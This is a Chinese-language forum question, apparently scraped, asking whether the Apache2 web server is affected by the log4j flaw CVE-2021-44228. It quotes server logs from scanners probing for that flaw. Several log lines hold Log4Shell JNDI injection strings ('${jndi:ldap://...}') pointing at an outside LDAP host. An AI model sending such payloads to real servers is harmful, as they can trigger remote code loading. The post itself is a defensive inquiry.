小编gil*_*lex的帖子

Apache Webserver 是否使用 log4j (CVE-2021-44228)？

apache web 服务器 (apache2) 使用 log4j 吗？

我在 Raspberry Pi OS（64 位）上安装了 Apache2 2.4.38（debian），并在日志中发现了一些关于来自（蜜罐/扫描仪）、（离线和恶意？）和（我不知道什么）的CVE-2021-44228的奇怪记录这是）kryptoslogic-cve-2021-44228.comdataastatistics.coma8fvkc.dnslog.cn

我现在应该怎么做？

没什么，因为 apache2 不受 CVE-2021-44228 的影响
格式化所有内容并等待几天，然后再安装修补版本
“检查”是否有任何新的 .class 文件以及是否没有继续操作（并使用手动补丁，例如log4j2.formatMsgNoLookups = TRUE
别的东西

日志：

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" …

Run Code Online (Sandbox Code Playgroud)

apache2

gil*_*lex

2021 12-15

44
推荐指数

2
解决办法

4万
查看次数

标签统计

apache2 ×1

Apache Webserver 是否使用 log4j (CVE-2021-44228)？

标签 统计

小编gil_lex的帖子

标签统计